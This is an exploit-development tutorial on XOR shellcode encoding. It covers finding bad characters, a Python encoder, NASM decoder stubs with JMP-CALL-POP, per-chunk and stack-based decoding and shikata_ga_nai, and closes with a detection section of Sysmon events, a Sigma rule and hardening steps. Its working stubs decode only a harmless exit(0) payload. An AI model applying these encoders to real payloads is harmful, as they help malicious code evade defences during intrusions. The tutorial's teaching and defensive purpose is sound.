Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

By Debraj Basak·Jun 20, 2026·14 min readExploit Development

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

ByteNameWhy it breaks things
\x00NULLTerminates C strings; strcpy/sprintf stop copying here
\x0aLine FeedRead as end-of-input by line-oriented protocols and gets
\x0dCarriage ReturnPaired with \x0a in HTTP/SMTP headers; often stripped
\x20SpaceToken delimiter in many parsers
\xff0xFFSentinel / length markers in some binary protocols

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A
AKA ⊕ K
000
011
101
110

There’s no key schedule, no S-box, no state to carry — which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in well under 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.


Flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target
XOR encoding and decoding are symmetric operations — the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the byte right before where the copy stopped is usually the terminator. Note it, exclude it, run again.


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, use the full mov ecx, payload_len and clear ECX with xor ecx, ecx first.

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */


<figure class="gxc-figure">
  <img src="https://genxcyber.com/wp-content/uploads/2026/06/shellcode-xor-encoding-custom-decoders-bad-chars-2-scaled.png" alt="Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode" loading="lazy" />
  <figcaption>JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.</figcaption>
</figure>


#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax\x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte
SchemeProCon
Fixed single keySmallest stub; one xor per byteFails when bad-char set is dense
Per-chunk keySurvives tight bad-char setsLarger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions like fstenv [esp-0xc] to recover EIP without a tell-tale CALL — a deliberate jab at emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

BehaviorWhat it reveals
Tight xor/inc/loop over a code regionClassic fixed-key decoder stub
Region transitions writable → executableDecoded payload about to run
Execution from unbacked memoryCode with no file on disk behind it

Sysmon Event IDs

Event IDNameRelevance
1Process CreationLoader/injector process spawn
7Image LoadedDLLs from temp/download paths into system processes
8CreateRemoteThreadThread created in another process — low-volume, high-signal
10ProcessAccessCross-process memory access; inspect GrantedAccess and CallTrace
25ProcessTamperingIn-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.

ETW providers

ProviderPurpose
Microsoft-Windows-Threat-IntelligenceKernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-AuditingEvent ID 4688 process creation with command line
AMSIInspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

Hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

ToolDescriptionLink
NASMAssemble x86/x64 decoder stubsnasm.us
GDB + pwndbgSingle-step the decode loop, inspect ESI/ECXgdb.gnu.org
objdump / objcopyDisassemble stubs, extract .text bytesgnu.org
CapstoneProgrammatic opcode audit for bad charscapstone-engine.org
pwntoolsEncoder/exploit automation (pwnlib.encoders)docs.pwntools.com
pe-sieve / MonetaScan live processes for RWX / unbacked memorygithub.com
SysmonEndpoint telemetry for Event IDs 8, 10, 25learn.microsoft.com

12. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Obfuscated Files or InformationT1027Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded FileT1027.013Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or InformationT1140Self-modifying memory; ACG violations; ETW VirtualProtect
Process InjectionT1055Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE InjectionT1055.002Shellcode written into another process; RWX region creation
Reflective Code LoadingT1620Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.

Related Tutorials

References

Get new drops in your inbox

Windows internals, exploit dev, and red-team write-ups — no spam, unsubscribe anytime.